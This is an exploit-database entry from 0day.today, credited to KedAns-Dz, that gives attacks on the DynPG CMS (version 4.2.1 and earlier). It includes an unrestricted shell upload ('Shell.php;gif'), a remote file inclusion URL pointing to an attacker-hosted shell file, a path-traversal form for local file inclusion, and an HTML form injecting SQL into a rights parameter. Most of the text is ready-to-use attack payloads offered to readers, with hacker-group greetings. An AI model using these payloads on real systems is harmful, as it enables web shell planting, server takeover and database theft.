[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DynPG <= 4.2.1 (FU/RFI/LFI.SQLi) Multiple Vulnerabilities

Author
KedAns-Dz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16025
Category
web applications
Date add
04-05-2011
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : DynPG <= 4.2.1 (FU/RFI/LFI.SQLi) Multiple Vulnerabilities
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Twitter page : twitter.com/kedans
# platform : php
# Impact : File Upload + Remote File Inclusion + Local File Inclusion . SQL Inj3cTi0n
# Tested on : Windows XP sp3 FR & Linux.(Ubuntu 10.10) En
###
# (~) special Greets to : Caddy-Dz & JaGo-Dz & Dr.Ride + All My Friends 
###

# (+) Exploit :

#=(1)==============[File Upload (FU) ]===>

http://[target]/[path]/_fileupload.php

 (!) The Access Not Forbidden !! (O_0) !!

 (*) Upload Shell.php;gif ... And Submit !

#=(2)==============[Remote File Inclusion (RFI) ]===>

 (!) Vulnerability in File 'tinymce.inc.php' :
>>> PHP Code Line:(357/367) '''''''''''''''''''''''''''
	if ( type == 'file' && field_name == 'href' ) {
     // 
     //
	var cmsURL = absolutPath + '../../../../backendpopup/popup.php?popUpResource=imagesURL&refID=' + field_name + '&valueID=' + field_name;
	var title = 'customLinkFileBrowser';
	var width = 700;
	var height = 500;
	var validCall = true;
	}
''''''''''''''''''''' <<< End

(+) http://[target]/[path]/backendpopup/popup.php?popUpResource=imagesURL&refID=http://[Ev!l-Sh3ll.txt]?

#=(3)==============[Local File Inclusion (LFI) ]===>

note : 'This Bug is olden by *High-Tech Bridge SA* in old version' << but is succeeding in this version

>> Html Code (1) 'Local File Include/Disclosure' :

<form action="http://[Target]/index.php" method="post" name="main" >
<input type="hidden" name="SYSTEM_NAME" value="[admin_login]" />
<input type="hidden" name="SYSTEM_PASSWORD" value="[admin_password]" />
<input type="hidden" name="SET_LANGUAGE" value="1" />
<input type="hidden" name="CHG_DYNPG_SET_LANGUAGE" value="../../../../../" />
<input type="submit" value="submit" name="submit" />
</form>

>> Html Code (2) 'SQL Inj3cTi0n :

<form action="http://[Target]/_rights.php" method="post" name="main" >
<input type="hidden" name="saveRights" value="1" />
<input type="hidden" name="giveRights_giveright" value="1" />
<input type="hidden" name="giveRights_UserId" value="123'SQL_CODE_HERE" />
<input type="submit" value="submit" name="submit" />
</form>

# (^_^) ! Good Luck ALL ...

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... 
# Exploit-Id Team : jos_ali_joe + kaMtiEz (exploit-id.com) ... All Others * TreX (hotturks.org) 
# JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================



#  0day.today [2024-11-15]  #